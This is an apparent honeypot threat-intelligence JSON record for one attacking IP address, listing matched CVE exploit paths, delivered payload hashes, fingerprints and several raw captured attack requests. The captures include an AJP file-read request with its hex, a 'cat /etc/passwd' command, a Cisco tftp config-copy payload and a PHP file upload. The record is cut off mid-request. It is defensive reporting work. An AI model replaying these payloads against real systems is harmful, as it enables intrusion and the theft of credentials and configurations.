{"ip":"8.216.88.236","total_events":1928,"verdict":{"verdict":"malicious","label":"Exploit attempts observed","detail":"51 exploit-path hits","confidence":"high","network_type":"CDN","why":["51 request(s) matched a known exploit path.","Body-carrying methods (POST/PUT/PATCH/DELETE) seen: payload delivery, not just recon.","5+ hits raise confidence to high.","Not in any known-scanner range.","Sent 9,971,468 bytes: sustained payload delivery, not a single opportunistic request.","Held a session open for 289s, against a median of well under a second."],"engagement":{"level":"payload","label":"Sustained payload, held open","detail":"9,971,468 bytes sent, longest session 289s","bytes_sent":9971468,"session_seconds":289,"persistent":true}},"first_seen":"2026-07-30T14:22:24","last_seen":"2026-07-30T21:12:37","events_24h":0,"events_7d":0,"geo":{"country_code":"JP","country_name":"Japan","region":"Tokyo","city":"Tokyo","lat":35.6893,"lon":139.6899,"asn":45102,"org":"Alibaba (US) Technology Co., Ltd."},"source_domain":null,"known_scanners":[],"scanner_tag":{"key":"peeringdb:as45102","label":"Alibaba","category":"cdn","url":"https://www.peeringdb.com/asn/45102"},"cve_matches":[{"cve_id":"CVE-2017-9841","title":"PHPUnit - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/phpunit/phpunit/src/Util/PHP/eval-stdin.php"},{"cve_id":"CVE-2018-10562","title":"Dasan GPON Devices - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/GponForm/diag_Form"},{"cve_id":"CVE-2018-6961","title":"VMware NSX SD-WAN Edge - Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/scripts/ajaxPortal.lua"},{"cve_id":"CVE-2020-5902","title":"F5 BIG-IP TMUI - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/tmui/locallb/workspace/tmshCmd.jsp"},{"cve_id":"CVE-2020-7961","title":"Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/api/jsonws/invoke"},{"cve_id":"CVE-2021-3129","title":"Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/_ignition/execute-solution"},{"cve_id":"CVE-2021-40539","title":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/./RestAPI/LogonCustomization"},{"cve_id":"CVE-2022-22947","title":"Spring Cloud Gateway Code Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/actuator/gateway/refresh"},{"cve_id":"CVE-2022-24816","title":"GeoServer <1.2.2 - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/geoserver/wms"},{"cve_id":"CVE-2022-35914","title":"GLPI <=10.0.2 - Remote Command Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/vendor/htmlawed/htmlawed/htmLawedTest.php"},{"cve_id":"CVE-2022-37042","title":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/zimbraAdmin/0MVzAe6pgwe5go1D.jsp"},{"cve_id":"CVE-2023-1389","title":"TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/cgi-bin/luci/;stok=/locale?form=country"},{"cve_id":"CVE-2023-20198","title":"Cisco IOS XE Web UI - Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/%2577eb%2575i_%2577sma_Http"},{"cve_id":"CVE-2023-22515","title":"Atlassian Confluence - Privilege Escalation","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/setup/setupadministrator-start.action"},{"cve_id":"CVE-2023-27524","title":"Apache Superset - Authentication Bypass","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/api/v1/database"},{"cve_id":"CVE-2023-29357","title":"Microsoft SharePoint - Authentication Bypass","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/_api/web/siteusers"},{"cve_id":"CVE-2023-34362","title":"MOVEit Transfer - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/moveitisapi/moveitisapi.dll"},{"cve_id":"CVE-2023-46747","title":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/mgmt/tm/auth/user"},{"cve_id":"CVE-2025-31161","title":"CrushFTP - Authentication Bypass","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/WebInterface/function"},{"cve_id":"CVE-2025-54236","title":"Adobe Commerce - Authentication Bypass","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/customer/address_file/upload"},{"cve_id":"CVE-2025-59287","title":"Windows Server Update Service - Insecure Deserialization","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/ReportingWebService/ReportingWebService.asmx"},{"cve_id":"CVE-2026-21643","title":"Fortinet FortiClientEMS 7.4.4 - SQL Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"/api/v1/init_consts"},{"cve_id":"CVE-2026-23760","title":"SmarterTools SmarterMail - Admin Password Reset","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"/api/v1/auth/force-reset-password"},{"cve_id":"CVE-2026-34197","title":"Apache ActiveMQ - Remote Code Execution","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"/api/jolokia/"},{"cve_id":"CVE-2017-18349","title":"Fastjson Insecure Deserialization - Remote Code Execution","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/deserialize"},{"cve_id":"CVE-2019-17444","title":"Jfrog Artifactory <6.17.0 - Default Admin Password","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/ui/auth/login"},{"cve_id":"CVE-2019-9733","title":"JFrog Artifactory 6.7.3 - Admin Login Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/artifactory/ui/auth/login"},{"cve_id":"CVE-2021-20837","title":"MovableType - Remote Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/mt/mt-xmlrpc.cgi"},{"cve_id":"CVE-2021-29441","title":"Nacos <1.4.1 - Authentication Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/nacos/v1/cs/configs"},{"cve_id":"CVE-2021-3378","title":"FortiLogger 4.4.2.2 - Arbitrary File Upload","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/Config/SaveUploadedHotspotLogoFile"},{"cve_id":"CVE-2021-46424","title":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/images/icons_title.gif"},{"cve_id":"CVE-2022-0948","title":"WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js"},{"cve_id":"CVE-2022-26960","title":"elFinder <=2.1.60 - Local File Inclusion","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc"},{"cve_id":"CVE-2022-29081","title":"Zoho ManageEngine - Access Control Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/x/..//RestAPI/LicenseMgr"},{"cve_id":"CVE-2022-29383","title":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/scgi-bin/platform.cgi"},{"cve_id":"CVE-2022-31814","title":"pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/pfblockerng/www/index.php"},{"cve_id":"CVE-2023-0777","title":"modoboa  2.0.4 - Admin TakeOver","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/accounts/login"},{"cve_id":"CVE-2023-2648","title":"Weaver E-Office 9.5 - Remote Code Execution","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/inc/jquery/uploadify/uploadify.php"},{"cve_id":"CVE-2023-6875","title":"WordPress POST SMTP Mailer <= 2.8.7 - Authorization Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/wp-json/post-smtp/v1/connect-app"},{"cve_id":"CVE-2023-6895","title":"Hikvision IP ping.php - Command Execution","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/php/ping.php"},{"cve_id":"CVE-2024-38289","title":"TurboMeeting - Boolean-based SQL Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/as/wapi/vmp"},{"cve_id":"CVE-2025-25570","title":"Vue Vben Admin - Default Credentials","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/basic-api/login"},{"cve_id":"CVE-2025-48827","title":"vBulletin 5.0.0-6.0.3 - Authentication Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/ajax/api/ad/wrapAdTemplate"},{"cve_id":"CVE-2025-67303","title":"ComfyUI-Manager < 3.38 - Configuration Overwrite","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/userdata/ComfyUI-Manager%2Fconfig.ini"},{"cve_id":"CVE-2019-20224","title":"Pandora FMS 7.0NG - Remote Command Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/pandora_console/index.php"},{"cve_id":"CVE-2022-41800","title":"F5 BIG-IP Appliance Mode - Command Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/mgmt/shared/iapp/rpm-spec-creator"},{"cve_id":"CVE-2023-29084","title":"ManageEngine ADManager Plus - Command Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/j_security_check"},{"cve_id":"CVE-2026-48313","title":"ColdFusion - Path Traversal","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/CFIDE/main/ide.cfm"}],"malware":[{"sha256":"7a6fcddec727604edc8a2e28485cfd3f9fe6700f500268d0b19084bf0748031d","family":"","vt_name":"payload","malicious":0,"total":75,"vt_status":"known","delivery":"wget","url_path":"/goform/setSysAdm","dest_port":2375,"hits":8,"last_seen":"2026-07-30 16:24:31"},{"sha256":"37bac135435db4b9ff1ad30db5e5b4f8711bb58f07dc968c1adb1cf96c66bc06","family":"","vt_name":"","malicious":0,"total":75,"vt_status":"uploaded","delivery":"curl","url_path":"/","dest_port":2375,"hits":4,"last_seen":"2026-07-30 14:25:30"},{"sha256":"1f768b76d90b4906e740a0699f78e676c215c80b9cb3bbd16e926f715b5775a9","family":"","vt_name":"","malicious":0,"total":75,"vt_status":"uploaded","delivery":"curl","url_path":"/cgi?2","dest_port":2375,"hits":4,"last_seen":"2026-07-30 16:26:08"},{"sha256":"a48091e81dd909dbc7d74b3cf5622baa3fbfb671f40de63a87b50f62d2f606b9","family":"","vt_name":"","malicious":0,"total":75,"vt_status":"uploaded","delivery":"curl","url_path":"/cgi-bin/system_mgr.cgi","dest_port":2375,"hits":1,"last_seen":"2026-07-30 14:24:34"},{"sha256":"069903fea05c36645acf3af731bfa91325684c97b3777426517477383a51add1","family":"","vt_name":"","malicious":0,"total":75,"vt_status":"uploaded","delivery":"curl","url_path":"/main/webservices/additional_webservices.php","dest_port":2375,"hits":1,"last_seen":"2026-07-30 14:28:03"}],"top_ports":[{"port":2375,"proto":"tcp","label":"Docker","count":1913},{"port":9042,"proto":"tcp","label":"Cassandra","count":9},{"port":43800,"proto":"tcp","label":"","count":1},{"port":9100,"proto":"tcp","label":"Printer","count":1},{"port":1666,"proto":"tcp","label":"","count":1},{"port":8009,"proto":"tcp","label":"","count":1},{"port":6200,"proto":"tcp","label":"","count":1},{"port":4712,"proto":"tcp","label":"","count":1}],"fingerprints":{"ssh_hassh":["2aec6b44b06bec95d73f66b5d30cb69a"],"tls_ja4":["t13i251000_b78ed14e2fd0_ab7e3b40a677"],"tls_ja3":["11a384388ad36777e1a2e121495037fe"],"ja4h":["ge11nn0300_0db47b7d240d","po11nn0500_b4ba55311b46","ge11cn0300_df70c3f63f2d","pu11nn0500_a2114bfb7d4c","po11nn07en_1d30a0c2f807"]},"fingerprint_peers":{"t13i251000_b78ed14e2fd0_ab7e3b40a677":59,"ge11nn0300_0db47b7d240d":5328,"po11nn0500_b4ba55311b46":142,"ge11cn0300_df70c3f63f2d":3,"pu11nn0500_a2114bfb7d4c":2,"po11nn07en_1d30a0c2f807":4,"2aec6b44b06bec95d73f66b5d30cb69a":21},"user_agents":["Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0","Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15","Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0","Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0","Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0","Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0","Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"],"timeline":[{"date":"2026-07-30","count":1928}],"recent_events":[{"timestamp":"2026-07-30T21:12:37","port":8009,"proto":"tcp","app_proto":"","app_protocol":"ajp","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"\u00124\u0002\u000e\u0002\u0002\u0000\bHTTP/1.1\u0000\u0000\u0013/examples/xxxxx.jsp\u0000\u0000\t127.0.0.1\u0000��\u0000\t127.0.0.1\u0000\u0000P\u0000\u0000\t�\u0006\u0000\nkeep-alive\u0000\u0000\u000fAccept-Language\u0000\u0000\u000een-US,en;q=0.5\u0000�\b\u0000\u00010\u0000\u0000\u000fAccept-Encoding\u0000\u0000\u0013gzip, deflate, sdch\u0000\u0000\rCache-Control\u0000\u0000\tmax-age=0\u0000�\u000e\u0000DMozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0\u0000\u0000\u0019Upgrade-Insecure-Requests\u0000\u0000\u00011\u0000�\u0001\u0000Jtext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\u0000�\u000b\u0000\t127.0.0.1\u0000\n\u0000!javax.servlet.include.request_uri\u0000\u0000\u0001/\u0000\n\u0000\u001fjavax.servlet.include.path_info\u0000\u0000\u0010/WEB-INF/web.xml\u0000\n\u0000\"javax.servlet.include.servlet_path\u0000\u0000\u0001/\u0000�","payload_hex":"1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff","method":"","user_agent":"","ja3":"","session":"8edc400f-14e5-4558-8b81-83f72a054568","seq":1,"duration_ms":100,"bytes_in":530,"bytes_out":12,"enriched":{"digest":"c737fb824d402ad6","strings":["HTTP/1.1","/examples/xxxxx.jsp","127.0.0.1","keep-alive","Accept-Language","en-US,en;q=0.5","Accept-Encoding","gzip, deflate, sdch","Cache-Control","max-age=0"],"iocs":{"ips":["127.0.0.1"],"paths":["/examples/xxxxx.jsp"]}}},{"timestamp":"2026-07-30T21:12:33","port":6200,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"cat /etc/passwd\n","payload_hex":"636174202f6574632f7061737377640a","method":"","user_agent":"","ja3":"","session":"f8811122-041d-4121-8c2e-d70f13749fe4","seq":1,"duration_ms":100,"bytes_in":16,"bytes_out":12,"enriched":{"digest":"3daf178f17825a82","strings":["cat /etc/passwd"],"iocs":{"paths":["/etc/passwd"]}}},{"timestamp":"2026-07-30T21:11:53","port":1666,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"��\u0000\u0000\u0000cmpfile\u0000\u0000\u0000\u0000\u0000\u0000altSync\u0000\u0000\u0000\u0000\u0000\u0000client\u0000\u0002\u0000\u0000\u000097\u0000api\u0000\u0005\u0000\u0000\u000099999\u0000enableStreams\u0000\u0000\u0000\u0000\u0000\u0000enableGraph\u0000\u0000\u0000\u0000\u0000\u0000expandAndmaps\u0000\u0000\u0000\u0000\u0000\u0000chunking\u0000\u0000\u0000\u0000\u0000\u0000host\u0000\t\u0000\u0000\u0000localhost\u0000port\u0000\u0012\u0000\u0000\u0000192.168.0.101:1666\u0000sndbuf\u0000\u0007\u0000\u0000\u00001969919\u0000rcvbuf\u0000\u0005\u0000\u0000\u000098304\u0000autoTune\u0000\u0001\u0000\u0000\u00001\u0000func\u0000\b\u0000\u0000\u0000protocol\u0000��\u0000\u0000\u0000version\u0000\u001c\u0000\u0000\u00002024.2/LINUX26X86_64/2697822\u0000autoLogin\u0000\u0000\u0000\u0000\u0000\u0000prog\u0000\u0002\u0000\u0000\u0000p4\u0000client\u0000\t\u0000\u0000\u0000localhost\u0000cwd\u0000\u0004\u0000\u0000\u0000/tmp\u0000host\u0000\t\u0000\u0000\u0000localhost\u0000os\u0000\u0004\u0000\u0000\u0000UNIX\u0000locale\u0000\u0001\u0000\u0000\u0000C\u0000user\u0000\u0004\u0000\u0000\u0000user\u0000unicode\u0000\u0000\u0000\u0000\u0000\u0000charset\u0000\u0001\u0000\u0000\u00001\u0000utf8bom\u0000\u0001\u0000\u0000\u00001\u0000clientCase\u0000\u0001\u0000\u0000\u00000\u0000func\u0000\t\u0000\u0000\u0000user-info\u0000","payload_hex":"efef000000636d7066696c65000000000000616c7453796e63000000000000636c69656e7400020000003937006170690005000000393939393900656e61626c6553747265616d73000000000000656e61626c654772617068000000000000657870616e64416e646d6170730000000000006368756e6b696e67000000000000686f737400090000006c6f63616c686f737400706f727400120000003139322e3136382e302e3130313a3136363600736e646275660007000000313936393931390072637662756600050000003938333034006175746f54756e650001000000310066756e63000800000070726f746f636f6c00eded00000076657273696f6e001c000000323032342e322f4c494e555832365838365f36342f32363937383232006175746f4c6f67696e00000000000070726f670002000000703400636c69656e7400090000006c6f63616c686f73740063776400040000002f746d7000686f737400090000006c6f63616c686f7374006f730004000000554e4958006c6f63616c65000100000043007573657200040000007573657200756e69636f6465000000000000636861727365740001000000310075746638626f6d00010000003100636c69656e74436173650001000000300066756e630009000000757365722d696e666f00","method":"","user_agent":"","ja3":"","session":"30bac278-57f2-4aa7-b2fa-c34d4ec9386e","seq":1,"duration_ms":100,"bytes_in":486,"bytes_out":12,"enriched":{"digest":"b764a734a43f3b39","strings":["cmpfile","altSync","client","99999","enableStreams","enableGraph","expandAndmaps","chunking","host","localhost"]}},{"timestamp":"2026-07-30T21:11:46","port":2375,"proto":"tcp","app_proto":"","app_protocol":"ssh","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"SSH-2.0-Go\r\n\u0000\u0000\u0002�\n\u0014�{�\f�q�>KP~,���\u0000\u0000\u0000�curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1\u0000\u0000\u0001-ssh-rsa-cert-v01@openssh.com,ssh-dss-cert-v01@openssh.com,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-rsa,ssh-dss,ssh-ed25519\u0000\u0000\u0000Maes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128\u0000\u0000\u0000Maes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128\u0000\u0000\u0000$hmac-sha2-256,hmac-sha1,hmac-sha1-96\u0000\u0000\u0000$hmac-sha2-256,hmac-sha1,hmac-sha1-96\u0000\u0000\u0000\u0004none\u0000\u0000\u0000\u0004none\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000��N��S\u000e���","payload_hex":"5353482d322e302d476f0d0a000002ec0a14e27be80cb0717fb23e4b507e2ca68fa30000008c637572766532353531392d736861323536406c69627373682e6f72672c656364682d736861322d6e697374703235362c656364682d736861322d6e697374703338342c656364682d736861322d6e697374703532312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d736861310000012d7373682d7273612d636572742d763031406f70656e7373682e636f6d2c7373682d6473732d636572742d763031406f70656e7373682e636f6d2c65636473612d736861322d6e697374703235362d636572742d763031406f70656e7373682e636f6d2c65636473612d736861322d6e697374703338342d636572742d763031406f70656e7373682e636f6d2c65636473612d736861322d6e697374703532312d636572742d763031406f70656e7373682e636f6d2c7373682d656432353531392d636572742d763031406f70656e7373682e636f6d2c65636473612d736861322d6e697374703235362c65636473612d736861322d6e697374703338342c65636473612d736861322d6e697374703532312c7373682d7273612c7373682d6473732c7373682d656432353531390000004d6165733132382d6374722c6165733139322d6374722c6165733235362d6374722c6165733132382d67636d406f70656e7373682e636f6d2c617263666f75723235362c617263666f75723132380000004d6165733132382d6374722c6165733139322d6374722c6165733235362d6374722c6165733132382d67636d406f70656e7373682e636f6d2c617263666f75723235362c617263666f757231323800000024686d61632d736861322d3235362c686d61632d736861312c686d61632d736861312d393600000024686d61632d736861322d3235362c686d61632d736861312c686d61632d736861312d3936000000046e6f6e65000000046e6f6e650000000000000000000000000090f44ec1ed530efeab9f","method":"","user_agent":"","ja3":"","session":"fb94510a-7ed2-4578-ab33-69e074e009f7","seq":1,"duration_ms":353,"bytes_in":764,"bytes_out":12,"enriched":{"digest":"8c110d8a19e6468a","label":"SSH","strings":["SSH-2.0-Go",">KP~,","curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nis…","-ssh-rsa-cert-v01@openssh.com,ssh-dss-cert-v01@openssh.com,ecdsa-sha2-nistp256-c…","Maes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128","$hmac-sha2-256,hmac-sha1,hmac-sha1-96","none"],"iocs":{"domains":["libssh.org","openssh.com"]}}},{"timestamp":"2026-07-30T21:11:07","port":2375,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0001\u0000\u0000\u0000\n\u0000\u0000\u0000P����������������������������������������������������U\\�h\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000����\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0001\u0000\u0000\u0000\b\u0000\u0000\u0001h\u0000\u0001\u0000\u0014\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0000\u0000!�c�`\u0000\u0000\u0000\u0002\u0001Tconfigure tftp-server nvram:startup-config\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000","payload_hex":"00000001000000010000000a00000050ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff555cca6800000000000000000000000000000000ffffffff00000001000000010000000100000008000001680001001400000001000000000021d863a560000000020154636f6e66696775726520746674702d736572766572206e7672616d3a737461727475702d636f6e666967000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000","method":"","user_agent":"","ja3":"","session":"854615cd-91a1-4b9a-aece-f97fa572eae9","seq":1,"duration_ms":100,"bytes_in":472,"bytes_out":12,"enriched":{"digest":"4d919748a7f73e84","strings":["Tconfigure tftp-server nvram:startup-config"]}},{"timestamp":"2026-07-30T21:10:58","port":2375,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\"accept-encoding\":\"gzip, deflate\",\"accept-language\":\"zh-CN,zh;q=0.8\",\"cache-control\":\"max-age=0\",\"content-length\":\"321\",\"content-type\":\"multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP\",\"cookie\":\"PHPSESSID=ibru7pqnplhi720caq0ev8uvt0\",\"host\":\"<HONEYPOT>:2375\",\"origin\":\"null\",\"upgrade-insecure-requests\":\"1\",\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36\"}","body":"------WebKitFormBoundaryAVuAKsvesmnWtgEP\r\nContent-Disposition: form-data; name=\"file\"; filename=\"%s.php \"\r\nContent-Type: application/octet-stream\r\n\r\n3HEiMTCToyZ0Y8ecRqhG3PqGq6i\r\n------WebKitFormBoundaryAVuAKsvesmnWtgEP\r\nContent-Disposition: form-data; 